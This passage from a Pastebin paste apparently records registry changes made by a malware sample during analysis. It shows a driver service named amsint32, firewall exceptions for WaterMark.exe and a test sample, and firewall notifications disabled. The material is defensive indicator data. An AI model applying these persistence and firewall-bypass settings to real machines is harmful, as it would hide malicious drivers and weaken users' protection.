  421. HKLM\System\CurrentControlSet\Services\amsint32\Enum\Count  REG_DWORD   4   0x1
  422. HKLM\System\CurrentControlSet\Services\amsint32\Enum\NextInstance   REG_DWORD   4   0x1
  423. HKLM\System\CurrentControlSet\Services\amsint32\ErrorControl    REG_DWORD   4   0x1
  424. HKLM\System\CurrentControlSet\Services\amsint32\ImagePath   REG_EXPAND_SZ   84  "C:\WINDOWS\system32\drivers\iurln.sys"
  425. HKLM\System\CurrentControlSet\Services\amsint32\Security\Security   REG_BINARY  168 ?
  426. HKLM\System\CurrentControlSet\Services\amsint32\Start   REG_DWORD   4   0x3
  427. HKLM\System\CurrentControlSet\Services\amsint32\Type    REG_DWORD   4   0x1
  428. HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\0    REG_SZ  64  "Root\LEGACY_IPFILTERDRIVER\0000"
  429. HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\Count    REG_DWORD   4   0x1
  430. HKLM\System\CurrentControlSet\Services\IpFilterDriver\Enum\NextInstance REG_DWORD   4   0x1
  431. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Microsoft\WaterMark.exe  REG_SZ  114 "C:\Program Files\Microsoft\WaterMark.exe:*:Enabled:ipsec"
  432. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:%MALWARESAMPLE% REG_SZ  70  "C:\TEST\sample.exe:*:Enabled:ipsec"
  433. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications  REG_DWORD   4   0x1
  434. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions  REG_DWORD   4   0x0
  435.  
  436. ----
  437. #MalwareMustDie!
  438. @unixfreaxjp
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!